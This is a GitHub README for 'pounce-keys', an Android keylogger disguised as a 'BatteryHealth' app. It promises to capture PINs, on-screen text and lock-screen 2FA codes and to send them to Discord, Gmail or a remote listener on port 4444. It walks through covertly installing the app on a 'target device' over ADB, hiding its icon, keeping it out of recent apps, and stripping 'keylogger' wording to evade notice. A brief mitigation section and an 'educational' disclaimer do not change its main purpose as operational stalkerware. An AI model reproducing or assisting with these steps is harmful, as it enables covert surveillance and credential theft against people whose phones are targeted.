/pounce-keys

pounce-keys, a new android keylogger made in 2023 to support nougat to android 13, full launcher stealth with a custom listener to filter out logs + support to send the logs to you're Discord server and Gmail

Primary LanguageJavaGNU General Public License v3.0GPL-3.0

GitHub Repo stars GitHub all releases Hits GitHub commit activity GitHub Snyk Vulnerabilities for GitHub Repo
GitHub Repo 2.2 stars Linode gmail discord


POUNCE-KEYS

Gmail listener [ Keylogger for Android ] πŸ±β€βŒ¨οΈ + Discord listener
View Release Β· Support Me Β· Request Feature

come check out my blog https://nullpounce.blog/ Buy Me a Coffee at ko-fi.com

BitCoin: 1EMZpRSBRUcbxnKfFJQ9G5bXDFNDkH7PNE

Monero: 4A75SgESZjVbTBwKH1wVF3KMCAbHUToEk3kFrgWZ2J8K9CiSnMbQdD2fBw1BPmpHrTTh314MJ3XvkP33isWDgMFQEZuTzut

my site (very wip, keeps breaking)

get apk editor studio from here https://qwertycube.com/apk-editor-studio/download/

HUGE UPDATE! Supports sending logs to Gmail and Discord

notes in release section, latest versions in release area. I have a working version that when the app icon is clicked it just says app not installed and it wont open, if you need anything custom just let me know, also the discord and java listener version could be changed to have a buffer showing 200 logs at a time vs non stop, blovks vs lines of spam. just let me know.

Screenshot 2023-03-12 041815 Screenshot 2023-03-12 150758 current gmail version has a buffer to prevent spam :) βœ… PASSED GOOGLE VIRUS SCAN

demo

Listener Features Linode Linode

βœ… reads hidden notifications in locked state (grabs google code before owner sees it)

βœ… grabs almost all text on the screen the user is looking at.

βœ… works over WAN without open ports on phones end

βœ… filtered tabs for different apps to reduce logs for easy reading

βœ… 300+ lines of error free custom code

βœ… gets pin code

βœ… auto scrolling

βœ… works in windows and linux as a .exe, .java, and .jar

βœ… asks user for ip and port with autofill (double check correct ip and port)

βœ… cute cat icon

βœ… logs date and time AND SAVES THEM

quick use (use latest release)

android 9 and bellow for now replace icon with transparent one in a icon editor

  • this is for phones with dynamic app icons or whatever it was if the icons shows for you.

jdk19

wget https://download.oracle.com/java/19/latest/jdk-19_linux-x64_bin.deb

sudo apt-get -qqy install ./jdk-19_linux-x64_bin.deb

sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk-19/bin/java 1919
git clone https://github.com/NullPounce/pounce-keys.git
cd pounce-keys/Listener/java
java -jar MessageListener.jar
sudo ufw allow 4444 "if on linode or on WAN" no need for open ports on android's side
download APK Editor studio and open up the apk and search for "192.168.0.135"
and replace the ip in the two smali files mainactivity and messegesener with your
own ip and save the apk thanks to 2.0 release

STEALTH ( OLD )

TIP! install via ADB to avoid recent apps timestamp, also settings does not show in this list, also to assure hiden icon in some cases UPDATE: if all fails try long pressing the home screen to open launcher settings for a hide apps option.

  1. have a device with adb setup in a terminal and run adb tcpip 5555 with a phone charger plugged in (also have the stealth apk ready in same dir)
  2. make a new folder on the adb pc with this structure com.BatteryHealth/files/keys/fix.dat
  3. in the fix.dat file you made, insert ip:port in line 1 and save (ip and port of remote device with pounce-keys listener, works in linode)
  4. grab target device , open settings , enable dev options if need be then usb debugging
  5. connect phone , tap always allow usb debug
  6. run adb tcpip 5555 again and run adb install Stealth.apk (this hides from recent apps and settings sometimes does not even show as opened)
  7. turn off usb debug and enable the accessibility service
  8. copy and paste the com.BatteryHealth folder into android/data after turning on file tranfer

in android 9 and bellow this will install the app with no icon on the launcher or docked apps (wont even be on the screen, perioid) only way you can see this is if you open accessibility settings or scroll all the way down in installed apps as its never a recent one. 10 and up this will add a shortut named ZbatteryHealth with no icon but will be seen in the launcher, move it to a folder or replace app name with \ in manifest file but this will make the app show in the top of installed

due to new security features android API 29 and above (Oreo and up I believe) it will make it hard to near impossible to hide the app without root. The stealth version does not allow the app to be open, just a white icon, and it just opens the app details menu, sits in the app drawer.

In stealth, you must make and place your own fix.dat file in the app directory Android/data/com.BatteryHealth/files/key/fix.dat after making fix.dat inside, add "192.168.0.135:4444" without the quotes and replace IP and port with your own IP:PORT

this option has removed all words "keylogger" and "malware" from UI and code as well as folders and hides the app 100% except settings installed list in android BELLOW Oreo, API 29 and up it will just open app info not showing the IP port field

Screenshot_20230121_092852 Screenshot_20230121_092759

NORMAL INSTALL

open the app and just place your IP:PORT and tap send (the ip of the device you will listen on) you may need to open settings/apps/app-name then tap 3 dots top right and allow special permissions make sure where you got the file from via web browser and or file manager has access,ES works if you have problems open accessibility settings and enable keylogger or BatteryHealth no manual fix.dat required

Stealth install tldr

stealth_install

create a file named fix.dat and copy and PASTE it into android/data/com.BatteryHealth/files/key/ insert ip and port of machine with java listener IP:port

ARE YOU'RE APPS VULNERABLE? TEST THEM NOW!

Use Pounce_keys in your dev workflow to assure your app is protected by keyloggers, this is a must for banking apps and yes some are vulnerable! Example even CalyxOS lock-sceen is vulnerable, fennec's browser URL tab is protected but not web pages.

dev

Screenshot 2023-01-21 180954

mitigations

can I protect my passwords from this, even while hacked? Open dev options and under privacy turn off show passwords when typed

how do I look for this

CHECK accessibility settings for any downloaded services or if any are on (name don't matter) hide apps section in launcher for a fix.dat file in android/data/APP-NAME/files/key/fix.dat installed apps section in settings, could show as a blank icon as ZBatteryHealth but this could be put in any apk (so rely on service list)

DonateiconπŸ’œ

thank you for the starstruck badge :)⭐ anysoft keyboard and malwarebytes has no issue with apk

BitCoin: 1EMZpRSBRUcbxnKfFJQ9G5bXDFNDkH7PNE

Monero: 4A75SgESZjVbTBwKH1wVF3KMCAbHUToEk3kFrgWZ2J8K9CiSnMbQdD2fBw1BPmpHrTTh314MJ3XvkP33isWDgMFQEZuTzut

If you've found my work to be valuable, I would greatly appreciate your support, Leave a star. Every little bit helps and allows me to keep creating and improving. Thank you for your consideration and support!

ko-fi

credits

original keylog apk forked from https://github.com/shivamsuyal/Android-Keylogger (current version barely uses its code)

icon "https://www.flaticon.com/free-icon/keylogger_8147179?term=keylogger&page=1&position=42&origin=search&related_id=8147179 https://www.flaticon.com/free-icon/hacking_2431702?related_id=2431702&origin=search

https://www.freepik.com/free-vector/cute-cat-computer-with-mouse-cartoon-vector-icon-illustration-animal-technology-icon-concept-isolated-premium-vector-flat-cartoon-style_18537569.htm#query=cat%20keyboard&position=1&from_view=search&track=sph#position=1&query=cat%20keyboard https://www.freepik.com/free-vector/chat-bot-mobile-chatting-isometric-concept_6342161.htm

βš–οΈ Legal Disclaimer: For Educational Purpose Only

note edit ufw rules if hosted online.